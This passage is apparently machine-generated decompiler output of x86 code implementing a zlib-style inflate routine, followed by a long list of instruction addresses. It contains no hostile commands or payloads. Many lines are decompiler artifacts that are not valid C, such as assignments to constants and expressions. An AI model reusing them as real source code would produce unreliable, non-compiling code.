																 *(__esi + 0x18) = "invalid distances set";
																L204:
																 *__ebx = 0x1d;
																goto L141;
															}
															 *(__esi + 0x18) = "invalid literal/lengths set";
															goto L204;
														}
														 *(__esi + 0x18) = "invalid code -- missing end-of-block";
														goto L204;
													}
													__ecx = _v52;
													__eflags = __ecx;
													if(__ecx == 0) {
														continue;
													}
													__edx = _v56;
													do {
														__eax =  *(__ebx + 0x68);
														 *((short*)(__ebx + 0x70 +  *(__ebx + 0x68) * 2)) = __dx;
														 *(__ebx + 0x68) =  *(__ebx + 0x68) + 1;
														__ecx = __ecx - 1;
														__eflags = __ecx;
													} while (__ecx != 0);
													continue;
												}
												_v20 = __ecx;
												while(1) {
													_t443 = __ecx + 3; // 0x14
													__eax = _t443;
													__eflags = __edi - _t443;
													if(__edi >= _t443) {
														break;
													}
													__ecx = _v8;
													__eflags = __ecx;
													if(__ecx == 0) {
														goto L332;
													}
													__eax = _v12;
													_v8 = __ecx;
													__ecx = __edi;
													 *_v12 & 0x000000ff = ( *_v12 & 0x000000ff) << __cl;
													__ecx = _v20;
													__edx = __edx + (( *_v12 & 0x000000ff) << __cl);
													_v12 = _v12 + 1;
													__edi = __edi + 8;
													_v16 = __edx;
												}
												__edx = __edx >> __cl;
												__ecx = __edx;
												__edx = __edx >> 3;
												__ecx = __ecx & 0x00000007;
												_push(0xfffffffd);
												_pop(__eax);
												__ecx = __ecx + 3;
												__eax = __eax - _v20;
												goto L228;
											}
											__eax = __eax >> 8;
											__ecx = __cl & 0x000000ff;
											__ecx = (__cl & 0x000000ff) + 2;
											_v56 = __ecx;
											__eflags = __edi - __ecx;
											if(__edi >= __ecx) {
												L215:
												__edx = _v16;
												__ecx = __ah & 0x000000ff;
												__eax = _v48;
												__edi = __edi - __ecx;
												__edx = _v16 >> __cl;
												_v16 = __edx;
												_v20 = __edi;
												__eflags = __eax;
												if(__eax == 0) {
													 *(__esi + 0x18) = "invalid bit length repeat";
													goto L25;
												}
												__eax =  *(__ebx + 0x6e + __eax * 2) & 0x0000ffff;
												__ecx = __edx;
												__ecx = __edx & 0x00000003;
												__edx = __edx >> 2;
												__ecx = __ecx + 3;
												_v56 = __eax;
												__edi = __edi - 2;
												goto L229;
											} else {
												goto L213;
											}
											while(1) {
												L213:
												__ecx = _v8;
												__eflags = __ecx;
												if(__ecx == 0) {
													goto L332;
												}
												_v8 = __ecx;
												__ecx = _v12;
												__edx =  *_v12 & 0x000000ff;
												__ecx = __edi;
												__edx = ( *_v12 & 0x000000ff) << __cl;
												__edi = __edi + 8;
												_v16 = _v16 + (( *_v12 & 0x000000ff) << __cl);
												_v12 = _v12 + 1;
												__eflags = __edi - _v56;
												if(__edi < _v56) {
													continue;
												}
												goto L215;
											}
											goto L332;
										}
										__eax = __eax >> 8;
										__ecx = __al & 0x000000ff;
										__eax = _v48;
										__edi = __edi - (__al & 0x000000ff);
										_v16 = _v16 >> __cl;
										_v20 = __edi;
										 *((short*)(__ebx + 0x70 + _v48 * 2)) = __dx;
										 *(__ebx + 0x68) =  *(__ebx + 0x68) + 1;
									}
									goto L237;
								case 0x13:
									L246:
									 *__ebx = 0x14;
									goto L247;
								case 0x14:
									L247:
									__eflags = __ecx - 6;
									if(__ecx < 6) {
										L251:
										__eax =  *(__ebx + 0x4c);
										__ecx =  *(__ebx + 0x54);
										 *(__ebx + 0x1bc4) =  *(__ebx + 0x1bc4) & 0x00000000;
										_v52 =  *(__ebx + 0x4c);
										0 = 1;
										__eax = 1 << __cl;
										__ecx =  *(__ebx + 0x4c);
										__eax = (1 << __cl) - 1;
										__eax = (1 << __cl) - 0x00000001 & __edx;
										__eax =  *( *(__ebx + 0x4c) + ((1 << __cl) - 0x00000001 & __edx) * 4);
										while(1) {
											__eax = __eax >> 8;
											__ecx = __cl & 0x000000ff;
											__eflags = (__cl & 0x000000ff) - __edi;
											if((__cl & 0x000000ff) <= __edi) {
												break;
											}
											__ecx = _v8;
											__eflags = __ecx;
											if(__ecx == 0) {
												goto L332;
											}
											__eax = _v12;
											_v8 = __ecx;
											__ecx = __edi;
											__edi = __edi + 8;
											_v20 = __edi;
											 *_v12 & 0x000000ff = ( *_v12 & 0x000000ff) << __cl;
											__ecx =  *(__ebx + 0x54);
											__edx = __edx + (( *_v12 & 0x000000ff) << __cl);
											_v12 = _v12 + 1;
											__eax =  *(__ebx + 0x4c);
											_v16 = __edx;
											0 = 1;
											1 << __cl = (1 << __cl) - 1;
											__edx = (1 << __cl) - 0x00000001 & _v16;
											__eflags = 1;
											__eax =  *( *(__ebx + 0x4c) + ((1 << __cl) - 0x00000001 & _v16) * 4);
											__edx = _v16;
										}
										__eflags = __al;
										if(__al == 0) {
											L261:
											__eax = __eax >> 8;
											__ecx = __cl & 0x000000ff;
											 *(__ebx + 0x1bc4) =  *(__ebx + 0x1bc4) + __ecx;
											__edi = __edi - __ecx;
											__edx = __edx >> __cl;
											__ecx = __eax;
											__ecx = __eax >> 0x10;
											_v16 = __edx;
											_v20 = __edi;
											 *(__ebx + 0x40) = __ecx;
											__eflags = __al;
											if(__al != 0) {
												__eflags = __al & 0x00000020;
												if((__al & 0x00000020) == 0) {
													__ecx = _v8;
													__eflags = __al & 0x00000040;
													if((__al & 0x00000040) == 0) {
														__eax = __al & 0x000000ff;
														__eax = __al & 0xf;
														__eflags = __eax;
														 *__ebx = 0x15;
														 *(__ebx + 0x48) = __eax;
														goto L268;
													}
													 *(__esi + 0x18) = "invalid literal/length code";
													L39:
													 *__ebx = 0x1d;
													goto L143;
												}
												 *(__ebx + 0x1bc4) =  *(__ebx + 0x1bc4) | 0xffffffff;
												 *__ebx = 0xb;
												goto L142;
											}
											 *__ebx = 0x19;
											goto L142;
										}
										__eflags = __al & 0x000000f0;
										if((__al & 0x000000f0) != 0) {
											goto L261;
										}
										__edi = 0;
										__ecx = __al & 0x000000ff;
										__ebx = __eax;
										__edi = 1;
										__ebx = __eax >> 8;
										__edx = __eax;
										__esi = __bl & 0x000000ff;
										__ecx = (__al & 0x000000ff) + __esi;
										__eax = __eax >> 0x10;
										__edi = 1 << __cl;
										__ecx = __esi;
										__edi = (1 << __cl) - 1;
										_v56 = __edx;
										(1 << __cl) - 0x00000001 & _v16 = ((1 << __cl) - 0x00000001 & _v16) >> __cl;
										__ecx = _v52;
										__edi = (((1 << __cl) - 0x00000001 & _v16) >> __cl) + __eax;
										__eax =  *((intOrPtr*)(_v52 + ((((1 << __cl) - 0x00000001 & _v16) >> __cl) + __eax) * 4));
										__ecx = __eax;
										__edi = _v20;
										__ecx = __eax >> 8;
										__esi = __cl & 0x000000ff;
										__ecx = __bl & 0x000000ff;
										__ebx = _v40;
										__esi = (__cl & 0x000000ff) + (__bl & 0x000000ff);
										__eflags = (__cl & 0x000000ff) + (__bl & 0x000000ff) - __edi;
										if((__cl & 0x000000ff) + (__bl & 0x000000ff) <= __edi) {
											L260:
											__esi = _a4;
											__ecx = __dh & 0x000000ff;
											__edx = _v16;
											__edx = _v16 >> __cl;
											__edi = __edi - __ecx;
											__eflags = __edi;
											 *(__ebx + 0x1bc4) = __ecx;
											goto L261;
										} else {
											goto L258;
										}
										while(1) {
											L258:
											__esi = _v8;
											__eflags = __esi;
											if(__esi == 0) {
												goto L331;
											}
											__esi = __esi - 1;
											__ecx = __edi;
											_v8 = __esi;
											__edi = __edi + 8;
											__esi = _v12;
											_v20 = __edi;
											__edi = __dh & 0x000000ff;
											 *__esi & 0x000000ff = ( *__esi & 0x000000ff) << __cl;
											_v16 = _v16 + (( *__esi & 0x000000ff) << __cl);
											__esi = __esi + 1;
											__eax = _v54 & 0x0000ffff;
											_v12 = __esi;
											0 = 1;
											__dl & 0x000000ff = (__dl & 0x000000ff) + __edi;
											__esi = 1 << __cl;
											__ecx = __edi;
											(1 << __cl) - 1 = (1 << __cl) - 0x00000001 & _v16;
											__esi = ((1 << __cl) - 0x00000001 & _v16) >> __cl;
											__esi = (((1 << __cl) - 0x00000001 & _v16) >> __cl) + (_v54 & 0x0000ffff);
											__eax =  *(__ebx + 0x4c);
											__eax =  *( *(__ebx + 0x4c) + ((((1 << __cl) - 0x00000001 & _v16) >> __cl) + (_v54 & 0x0000ffff)) * 4);
											__eax = __eax >> 8;
											__ecx = __cl & 0x000000ff;
											__ecx = (__cl & 0x000000ff) + __edi;
											__edi = _v20;
											__eflags = __ecx - __edi;
											if(__ecx > __edi) {
												continue;
											}
											goto L260;
										}
										goto L331;
									}
									__eax = _v28;
									__eflags = __eax - 0x102;
									if(__eax < 0x102) {
										goto L251;
									}
									__ebx = _v32;
									_push(_v44);
									 *(__esi + 0xc) = _v32;
									__ebx = _v40;
									 *(__esi + 0x10) = __eax;
									__eax = _v12;
									 *__esi = _v12;
									 *(__esi + 4) = __ecx;
									_push(__esi);
									 *(__ebx + 0x38) = __edx;
									 *(__ebx + 0x3c) = __edi;
									__eax = E01323840();
									__eflags =  *__ebx - 0xb;
									__eax =  *(__esi + 0xc);
									__edx =  *(__ebx + 0x38);
									__edi =  *(__ebx + 0x3c);
									_pop(__ecx);
									_v32 =  *(__esi + 0xc);
									__eax =  *(__esi + 0x10);
									_pop(__ecx);
									__ecx =  *(__esi + 4);
									_v28 =  *(__esi + 0x10);
									__eax =  *__esi;
									_v12 =  *__esi;
									_v8 = __ecx;
									_v16 = __edx;
									_v20 = __edi;
									if( *__ebx == 0xb) {
										 *(__ebx + 0x1bc4) =  *(__ebx + 0x1bc4) | 0xffffffff;
									}
									goto L143;
								case 0x15:
									L268:
									__esi =  *(__ebx + 0x48);
									__eflags = __esi;
									if(__esi == 0) {
										L274:
										__eax =  *(__ebx + 0x40);
										 *(__ebx + 0x1bc8) =  *(__ebx + 0x40);
										 *__ebx = 0x16;
										goto L275;
									}
									__eflags = __edi - __esi;
									if(__edi >= __esi) {
										L273:
										__eax = 0;
										__ecx = __esi;
										__eax = 1;
										__edi = __edi - __esi;
										1 << __cl = (1 << __cl) - 1;
										_v20 = __edi;
										__eax = (1 << __cl) - 0x00000001 & __edx;
										__edx = __edx >> __cl;
										 *(__ebx + 0x40) =  *(__ebx + 0x40) + __eax;
										_t601 = __ebx + 0x1bc4;
										 *_t601 =  *(__ebx + 0x1bc4) + __esi;
										__eflags =  *_t601;
										_v16 = __edx;
										goto L274;
									}
									__eax = _v12;
									while(1) {
										__eflags = __ecx;
										if(__ecx == 0) {
											goto L331;
										}
										__eax =  *__eax & 0x000000ff;
										_v8 = __ecx;
										__ecx = __edi;
										__eax = __eax << __cl;
										__edi = __edi + 8;
										__ecx = _v8;
										__edx = __edx + __eax;
										__eax = _v12;
										__eax = _v12 + 1;
										_v16 = __edx;
										_v12 = __eax;
										__eflags = __edi - __esi;
										if(__edi < __esi) {
											continue;
										}
										goto L273;
									}
									goto L331;
								case 0x16:
									L275:
									__ecx =  *(__ebx + 0x58);
									__eax = 0;
									__esi =  *(__ebx + 0x50);
									1 = 1 << __cl;
									__eax = (1 << __cl) - 1;
									_v52 = __esi;
									__eax = (1 << __cl) - 0x00000001 & __edx;
									__eax =  *(__esi + ((1 << __cl) - 0x00000001 & __edx) * 4);
									1 = 1 >> 8;
									__ecx = __cl & 0x000000ff;
									__eflags = (__cl & 0x000000ff) - __edi;
									if((__cl & 0x000000ff) <= __edi) {
										L279:
										__eflags = __al & 0x000000f0;
										if((__al & 0x000000f0) != 0) {
											L284:
											__esi = _a4;
											__eax = __eax >> 8;
											__ecx = __cl & 0x000000ff;
											 *(__ebx + 0x1bc4) =  *(__ebx + 0x1bc4) + __ecx;
											__edi = __edi - __ecx;
											__edx = __edx >> __cl;
											_v16 = __edx;
											_v20 = __edi;
											__eflags = __al & 0x00000040;
											if((__al & 0x00000040) == 0) {
												__ecx = __eax;
												 *__ebx = 0x17;
												__ecx = __eax >> 0x10;
												__eax = __al & 0x000000ff;
												__eax = __al & 0xf;
												__eflags = __eax;
												 *(__ebx + 0x44) = __ecx;
												 *(__ebx + 0x48) = __eax;
												goto L287;
											}
											 *(__esi + 0x18) = "invalid distance code";
											goto L25;
										}
										__edi = 0;
										__ecx = __al & 0x000000ff;
										__ebx = __eax;
										__edi = 1;
										__ebx = __eax >> 8;
										__edx = __eax;
										__esi = __bl & 0x000000ff;
										__ecx = (__al & 0x000000ff) + __esi;
										__eax = __eax >> 0x10;
										__edi = 1 << __cl;
										__ecx = __esi;
										__edi = (1 << __cl) - 1;
										_v56 = __edx;
										(1 << __cl) - 0x00000001 & _v16 = ((1 << __cl) - 0x00000001 & _v16) >> __cl;
										__ecx = _v52;
										__edi = (((1 << __cl) - 0x00000001 & _v16) >> __cl) + __eax;
										__eax =  *(_v52 + ((((1 << __cl) - 0x00000001 & _v16) >> __cl) + __eax) * 4);
										__ecx = __eax;
										__edi = _v20;
										__ecx = __eax >> 8;
										__esi = __cl & 0x000000ff;
										__ecx = __bl & 0x000000ff;
										__ebx = _v40;
										__esi = (__cl & 0x000000ff) + (__bl & 0x000000ff);
										__eflags = (__cl & 0x000000ff) + (__bl & 0x000000ff) - __edi;
										if((__cl & 0x000000ff) + (__bl & 0x000000ff) <= __edi) {
											L283:
											__ecx = __dh & 0x000000ff;
											__edx = _v16;
											__edi = __edi - __ecx;
											__edx = _v16 >> __cl;
											_t647 = __ebx + 0x1bc4;
											 *_t647 =  *(__ebx + 0x1bc4) + __ecx;
											__eflags =  *_t647;
											goto L284;
										} else {
											goto L281;
										}
										while(1) {
											L281:
											__esi = _v8;
											__eflags = __esi;
											if(__esi == 0) {
												goto L331;
											}
											__esi = __esi - 1;
											__ecx = __edi;
											_v8 = __esi;
											__edi = __edi + 8;
											__esi = _v12;
											_v20 = __edi;
											__edi = __dh & 0x000000ff;
											 *__esi & 0x000000ff = ( *__esi & 0x000000ff) << __cl;
											_v16 = _v16 + (( *__esi & 0x000000ff) << __cl);
											__esi = __esi + 1;
											__eax = _v54 & 0x0000ffff;
											_v12 = __esi;
											0 = 1;
											__dl & 0x000000ff = (__dl & 0x000000ff) + __edi;
											__esi = 1 << __cl;
											__ecx = __edi;
											(1 << __cl) - 1 = (1 << __cl) - 0x00000001 & _v16;
											__esi = ((1 << __cl) - 0x00000001 & _v16) >> __cl;
											__esi = (((1 << __cl) - 0x00000001 & _v16) >> __cl) + (_v54 & 0x0000ffff);
											__eax =  *(__ebx + 0x50);
											__eax =  *( *(__ebx + 0x50) + ((((1 << __cl) - 0x00000001 & _v16) >> __cl) + (_v54 & 0x0000ffff)) * 4);
											__eax = __eax >> 8;
											__ecx = __cl & 0x000000ff;
											__ecx = (__cl & 0x000000ff) + __edi;
											__edi = _v20;
											__eflags = __ecx - __edi;
											if(__ecx > __edi) {
												continue;
											}
											goto L283;
										}
										goto L331;
									}
									__esi = _v8;
									while(1) {
										__eflags = __esi;
										if(__esi == 0) {
											goto L331;
										}
										__eax = _v12;
										__ecx = __edi;
										__esi = __esi - 1;
										__edi = __edi + 8;
										_v8 = __esi;
										_v20 = __edi;
										 *_v12 & 0x000000ff = ( *_v12 & 0x000000ff) << __cl;
										__ecx =  *(__ebx + 0x58);
										__edx = __edx + (( *_v12 & 0x000000ff) << __cl);
										_v12 = _v12 + 1;
										__eax =  *(__ebx + 0x50);
										_v16 = __edx;
										0 = 1;
										1 << __cl = (1 << __cl) - 1;
										__edx = (1 << __cl) - 0x00000001 & _v16;
										__eax =  *( *(__ebx + 0x50) + ((1 << __cl) - 0x00000001 & _v16) * 4);
										__ecx = __eax;
										__edx = _v16;
										__eax >> 8 = __cl & 0x000000ff;
										__eflags = (__cl & 0x000000ff) - __edi;
										if((__cl & 0x000000ff) > __edi) {
											continue;
										}
										goto L279;
									}
									goto L331;
								case 0x17:
									L287:
									__ecx =  *(__ebx + 0x48);
									__eflags = __ecx;
									if(__ecx == 0) {
										L293:
										 *__ebx = 0x18;
										goto L294;
									}
									__eflags = __edi - __ecx;
									if(__edi >= __ecx) {
										L292:
										__eax = 0;
										__edi = __edi - __ecx;
										__eax = 1;
										_v20 = __edi;
										1 << __cl = (1 << __cl) - 1;
										__eax = (1 << __cl) - 0x00000001 & __edx;
										__edx = __edx >> __cl;
										 *(__ebx + 0x44) =  *(__ebx + 0x44) + __eax;
										_t670 = __ebx + 0x1bc4;
										 *_t670 =  *(__ebx + 0x1bc4) + __ecx;
										__eflags =  *_t670;
										_v16 = __edx;
										goto L293;
									}
									__eax = _v12;
									while(1) {
										__ecx = _v8;
										__eflags = __ecx;
										if(__ecx == 0) {
											goto L332;
										}
										__eax =  *__eax & 0x000000ff;
										_v8 = __ecx;
										__ecx = __edi;
										__eax = __eax << __cl;
										__edi = __edi + 8;
										__ecx =  *(__ebx + 0x48);
										__edx = __edx + __eax;
										__eax = _v12;
										__eax = _v12 + 1;
										_v16 = __edx;
										_v12 = __eax;
										__eflags = __edi - __ecx;
										if(__edi < __ecx) {
											continue;
										}
										goto L292;
									}
									goto L332;
								case 0x18:
									L294:
									__ecx = _v28;
									__eflags = __ecx;
									if(__ecx == 0) {
										goto L331;
									}
									__eax = _v44;
									__eax = _v44 - __ecx;
									__ecx =  *(__ebx + 0x44);
									__eflags = __ecx - __eax;
									if(__ecx <= __eax) {
										__eax = _v32;
										__eax = _v32 - __ecx;
										__eflags = __eax;
										_v56 = __eax;
										__eax =  *(__ebx + 0x40);
										L305:
										__ecx = __eax;
										L306:
										__esi = _v28;
										__eflags = __ecx - __esi;
										__ecx =  >  ? __esi : __ecx;
										__esi = __esi - __ecx;
										__eax = __eax - __ecx;
										_v28 = __esi;
										__esi = _v56;
										 *(__ebx + 0x40) = __eax;
										__ebx = _v32;
										__esi = _v56 - __ebx;
										__eflags = __esi;
										do {
											__al =  *((intOrPtr*)(__esi + __ebx));
											 *__ebx = __al;
											__ebx = __ebx + 1;
											__ecx = __ecx - 1;
											__eflags = __ecx;
										} while (__ecx != 0);
										__esi = _a4;
										_v32 = __ebx;
										__ebx = _v40;
										__eflags =  *(__ebx + 0x40) - __ecx;
										if( *(__ebx + 0x40) == __ecx) {
											 *__ebx = 0x14;
										}
										goto L142;
									}
									__ecx = __ecx - __eax;
									__eflags = __ecx -  *((intOrPtr*)(__ebx + 0x2c));
									if(__ecx <=  *((intOrPtr*)(__ebx + 0x2c))) {
										L299:
										__eax =  *(__ebx + 0x34);
										__eflags = __ecx -  *((intOrPtr*)(__ebx + 0x30));
										if(__ecx <=  *((intOrPtr*)(__ebx + 0x30))) {
											__eax = __eax - __ecx;
											__eax = __eax +  *((intOrPtr*)(__ebx + 0x30));
											__eflags = __eax;
										} else {
											__ecx = __ecx -  *((intOrPtr*)(__ebx + 0x30));
											__eax = __eax +  *((intOrPtr*)(__ebx + 0x28));
											__eax = __eax - __ecx;
										}
										_v56 = __eax;
										__eax =  *(__ebx + 0x40);
										__eflags = __ecx - __eax;
										if(__ecx <= __eax) {
											goto L306;
										} else {
											goto L305;
										}
									}
									__eflags =  *(__ebx + 0x1bc0);
									if( *(__ebx + 0x1bc0) == 0) {
										goto L299;
									}
									 *(__esi + 0x18) = "invalid distance too far back";
									goto L25;
								case 0x19:
									__eflags = _v28;
									if(_v28 == 0) {
										goto L331;
									}
									__esi = _v32;
									__al =  *(__ebx + 0x40);
									_v32 = _v32 + 1;
									_v28 = _v28 - 1;
									 *_v32 = __al;
									__esi = _a4;
									 *__ebx = 0x14;
									goto L143;
								case 0x1a:
									__eflags =  *(__ebx + 8);
									if ( *(__ebx + 8) == 0) goto L315;
									__eflags = _v2097152004 & __bh;
								case 0x1b:
									__eax = 0;
									__eflags =  *(__ebx + 8);
									if( *(__ebx + 8) == 0) {
										L327:
										 *__ebx = 0x1c;
										goto L328;
									}
									__eflags =  *(__ebx + 0x10);
									if( *(__ebx + 0x10) == 0) {
										goto L327;
									}
									__eflags = __edi - 0x20;
									if(__edi >= 0x20) {
										L323:
										__eflags = __edx -  *((intOrPtr*)(__ebx + 0x1c));
										if(__edx ==  *((intOrPtr*)(__ebx + 0x1c))) {
											_v16 = __eax;
											__edi = __eax;
											goto L327;
										}
										 *(__esi + 0x18) = "incorrect length check";
										L25:
										 *_t815 = 0x1d;
										L142:
										_t819 = _v8;
										goto L143;
									}
									__eax = _v12;
									while(1) {
										__eflags = __ecx;
										if(__ecx == 0) {
											goto L331;
										}
										__eax =  *__eax & 0x000000ff;
										_v8 = __ecx;
										__ecx = __edi;
										__eax = __eax << __cl;
										__edi = __edi + 8;
										__ecx = _v8;
										__edx = __edx + __eax;
										__eax = _v12;
										__eax = _v12 + 1;
										_v16 = __edx;
										_v12 = __eax;
										_v20 = __edi;
										__eflags = __edi - 0x20;
										if(__edi < 0x20) {
											continue;
										}
										__eax = 0;
										__eflags = 0;
										goto L323;
									}
									goto L331;
								case 0x1c:
									L328:
									__eax = 0;
									__eax = 1;
									goto L330;
								case 0x1d:
									_push(0xfffffffd);
									_pop(__eax);
									L330:
									_v36 = __eax;
									L331:
									_t826 = _v8;
									L332:
									_t733 =  &_a4; // 0x38
									_t850 =  *_t733;
									 *(_t850 + 0xc) = _v32;
									_t737 =  &_v12; // 0x38
									 *(_t850 + 0x10) = _v28;
									_t838 = 0;
									 *_t850 =  *_t737;
									 *(_t850 + 4) = _t826;
									_t815[0xf] = _t844;
									_t845 = _v44;
									_t815[0xe] = _v16;
									__eflags = _t815[0xa];
									if(_t815[0xa] != 0) {
										L337:
										_t799 = E01322DCB(_t850,  *(_t850 + 0xc), _t845 -  *(_t850 + 0x10));
										__eflags = _t799;
										if(_t799 == 0) {
											_t838 = 0;
											__eflags = 0;
											L341:
											_t801 = _v60 -  *(_t850 + 4);
											_t846 = _t845 -  *(_t850 + 0x10);
											 *((intOrPtr*)(_t850 + 8)) =  *((intOrPtr*)(_t850 + 8)) + _t801;
											 *((intOrPtr*)(_t850 + 0x14)) =  *((intOrPtr*)(_t850 + 0x14)) + _t846;
											_t815[7] = _t815[7] + _t846;
											_v60 = _t801;
											__eflags = _t815[2] - _t838;
											if(_t815[2] != _t838) {
												__eflags = _t846;
												if(_t846 != 0) {
													_push(_t846);
													_push( *(_t850 + 0xc) - _t846);
													_push(_t815[6]);
													__eflags = _t815[4] - _t838;
													if(_t815[4] == _t838) {
														_t811 = E01322E91();
													} else {
														_t811 = E013230C1();
													}
													_t815[6] = _t811;
													_t838 = 0;
													__eflags = 0;
													 *(_t850 + 0x30) = _t811;
												}
											}
											__eflags =  *_t815 - 0x13;
											if( *_t815 == 0x13) {
												L349:
												_t838 = 0x100;
												goto L350;
											} else {
												__eflags =  *_t815 - 0xe;
												if( *_t815 != 0xe) {
													L350:
													_a4 = 0x80;
													asm("sbb ecx, ecx");
													__eflags =  *_t815 - 0xb;
													_t803 =  ==  ? _a4 : 0;
													_t804 = ( ==  ? _a4 : 0) + ( ~(_t815[1]) & 0x00000040) + _t838;
													_t805 = ( ==  ? _a4 : 0) + ( ~(_t815[1]) & 0x00000040) + _t838 + _t815[0xf];
													 *((intOrPtr*)(_t850 + 0x2c)) = ( ==  ? _a4 : 0) + ( ~(_t815[1]) & 0x00000040) + _t838 + _t815[0xf];
													__eflags = _v60;
													if(_v60 != 0) {
														L352:
														__eflags = _a8 - 4;
														if(_a8 != 4) {
															return _v36;
														}
														L353:
														_t807 = _v36;
														__eflags = _t807;
														_push(0xfffffffb);
														_pop(_t831);
														_t808 =  ==  ? _t831 : _t807;
														return  ==  ? _t831 : _t807;
													}
													__eflags = _t846;
													if(_t846 == 0) {
														goto L353;
													}
													goto L352;
												}
												goto L349;
											}
										}
										 *_t815 = 0x1e;
										goto L339;
									}
									__eflags = _t845 -  *(_t850 + 0x10);
									if(_t845 ==  *(_t850 + 0x10)) {
										goto L341;
									}
									__eflags =  *_t815 - 0x1d;
									if( *_t815 >= 0x1d) {
										goto L341;
									}
									__eflags =  *_t815 - 0x1a;
									if( *_t815 < 0x1a) {
										goto L337;
									}
									__eflags = _a8 - 4;
									if(_a8 == 4) {
										goto L341;
									}
									goto L337;
								case 0x1e:
									L339:
									_push(0xfffffffc);
									goto L145;
							}
							L143:
							_t776 =  *_t815;
						} while (_t776 <= 0x1e);
					}
				}
			}

0x01321744
0x01321744
0x0132174a
0x01321dd0
0x01321dd0
0x01321dd2
0x01321dd2
0x00000000
0x01321dd2
0x01321750
0x01321753
0x01321758
0x01321779
0x0132177b
0x0132177b
0x01321784
0x01321787
0x0132178a
0x01321790
0x01321795
0x01321798
0x0132179e
0x013217a1
0x013217a3
0x013217a6
0x013217a9
0x013217ac
0x013217af
0x013217b5
0x013217bb
0x013217bb
0x013217be
0x013217be
0x00000000
0x013217c9
0x013217d6
0x013217d8
0x013217d9
0x013217db
0x0132180d
0x0132180d
0x01321811
0x01321856
0x01321856
0x0132185a
0x0132185d
0x0132185f
0x01321861
0x01321861
0x01321861
0x01321861
0x01321865
0x01321869
0x01321904
0x01321904
0x00000000
0x01321904
0x0132187c
0x0132187e
0x01321880
0x01321883
0x01321885
0x01321888
0x00000000
0x00000000
0x0132188e
0x01321890
0x013218a4
0x013218a7
0x013218ac
0x013218b2
0x013218b5
0x013218b8
0x013218bc
0x013218f6
0x013218f9
0x00000000
0x00000000
0x013218fb
0x00000000
0x013218be
0x013218be
0x013218c1
0x013218c1
0x013218cb
0x013218ce
0x013218db
0x013218e1
0x013218e4
0x013218e4
0x013218e7
0x013218e9
0x00000000
0x013218e9
0x01321892
0x01321892
0x00000000
0x01321892
0x01321890
0x01321813
0x01321819
0x00000000
0x0132181b
0x0132181b
0x01321825
0x01321828
0x0132182a
0x0132182b
0x01321834
0x0132183b
0x01321840
0x01321842
0x01321845
0x01321848
0x0132184b
0x00000000
0x0132184b
0x013217dd
0x013217dd
0x013217dd
0x013217e0
0x013217e0
0x013217e2
0x00000000
0x00000000
0x013217ec
0x013217f1
0x013217f3
0x013217f6
0x013217f9
0x013217fb
0x013217fe
0x013217ff
0x01321802
0x01321805
0x01321808
0x0132180b
0x00000000
0x00000000
0x00000000
0x0132180b
0x00000000
0x013217e0
0x013217cb
0x013217cb
0x00000000
0x013217cb
0x00000000
0x0132190d
0x0132190f
0x01321910
0x01321912
0x01321944
0x01321944
0x01321947
0x0132194a
0x0132195e
0x01321964
0x0132196f
0x01321972
0x01321974
0x01321978
0x0132197b
0x0132197b
0x0132197e
0x0132197e
0x01321980
0x01321987
0x01321989
0x0132198c
0x01321991
0x01321995
0x013219a0
0x013219a0
0x013219a3
0x013219a6
0x013219a6
0x013219a8
0x013219aa
0x013219b0
0x013219b3
0x00000000
0x013219b3
0x01321966
0x00000000
0x01321966
0x0132194c
0x00000000
0x0132194c
0x01321914
0x01321914
0x01321917
0x01321917
0x01321919
0x00000000
0x00000000
0x0132191f
0x01321923
0x01321926
0x01321928
0x0132192a
0x0132192d
0x01321930
0x01321932
0x01321932
0x01321935
0x01321936
0x01321939
0x0132193c
0x0132193f
0x01321942
0x00000000
0x00000000
0x00000000
0x01321942
0x00000000
0x00000000
0x013219b5
0x013219b5
0x013219b8
0x013219e7
0x013219e7
0x013219ea
0x013219ec
0x013219ee
0x013219ee
0x013219f1
0x013219f8
0x013219fa
0x013219fc
0x013219ff
0x01321a02
0x01321a07
0x01321a0a
0x01321a0d
0x01321a12
0x01321a16
0x01321a21
0x01321a21
0x01321a24
0x01321a27
0x01321a27
0x01321a29
0x01321a2b
0x01321a31
0x01321a34
0x00000000
0x01321a34
0x013219ba
0x013219ba
0x013219bd
0x013219bd
0x013219bf
0x00000000
0x00000000
0x013219c5
0x013219c9
0x013219cc
0x013219ce
0x013219d0
0x013219d3
0x013219d6
0x013219d8
0x013219d8
0x013219db
0x013219dc
0x013219df
0x013219e2
0x013219e5
0x00000000
0x00000000
0x00000000
0x013219e5
0x00000000
0x00000000
0x01321a36
0x01321a36
0x01321a38
0x01321a39
0x01321a3b
0x01321a6a
0x01321a6a
0x01321a6d
0x01321a6f
0x01321a71
0x01321a74
0x01321a77
0x01321a79
0x01321a7c
0x01321a7c
0x01321a7f
0x01321a7f
0x01321a82
0x01321a89
0x01321a8b
0x01321a8e
0x01321a93
0x01321a97
0x01321aa2
0x01321aa2
0x01321aa5
0x01321aa8
0x01321aa8
0x01321aaa
0x01321aac
0x01321ab2
0x01321ab4
0x01321ab7
0x00000000
0x01321ab7
0x01321a3d
0x01321a3d
0x01321a40
0x01321a40
0x01321a42
0x00000000
0x00000000
0x01321a48
0x01321a4c
0x01321a4f
0x01321a51
0x01321a53
0x01321a56
0x01321a59
0x01321a5b
0x01321a5b
0x01321a5e
0x01321a5f
0x01321a62
0x01321a65
0x01321a68
0x00000000
0x00000000
0x00000000
0x01321a68
0x00000000
0x00000000
0x01321aba
0x01321aba
0x01321ac1
0x01321b33
0x01321b36
0x01321b38
0x01321b3a
0x01321b3a
0x01321b3a
0x01321b3a
0x01321b3e
0x01321b3e
0x00000000
0x01321b3e
0x01321ac3
0x01321ac5
0x01321ac6
0x01321ac8
0x01321af7
0x01321af7
0x01321afa
0x01321afd
0x01321aff
0x01321b01
0x01321b01
0x01321b04
0x01321b0b
0x01321b0d
0x01321b10
0x01321b15
0x01321b19
0x01321b24
0x01321b24
0x01321b27
0x01321b29
0x01321b2b
0x01321b2e
0x00000000
0x01321b2e
0x01321aca
0x01321aca
0x01321acd
0x01321acd
0x01321acf
0x00000000
0x00000000
0x01321ad5
0x01321ad9
0x01321adc
0x01321ade
0x01321ae0
0x01321ae3
0x01321ae6
0x01321ae8
0x01321ae8
0x01321aeb
0x01321aec
0x01321aef
0x01321af2
0x01321af5
0x00000000
0x00000000
0x00000000
0x01321af5
0x00000000
0x00000000
0x01321b44
0x01321b44
0x01321b4b
0x01321bd4
0x01321bd4
0x01321bd6
0x01321bd6
0x01321bd9
0x01321bdc
0x00000000
0x01321bdc
0x01321b51
0x01321b54
0x01321b57
0x01321b59
0x01321b5c
0x01321b5f
0x01321b61
0x01321b63
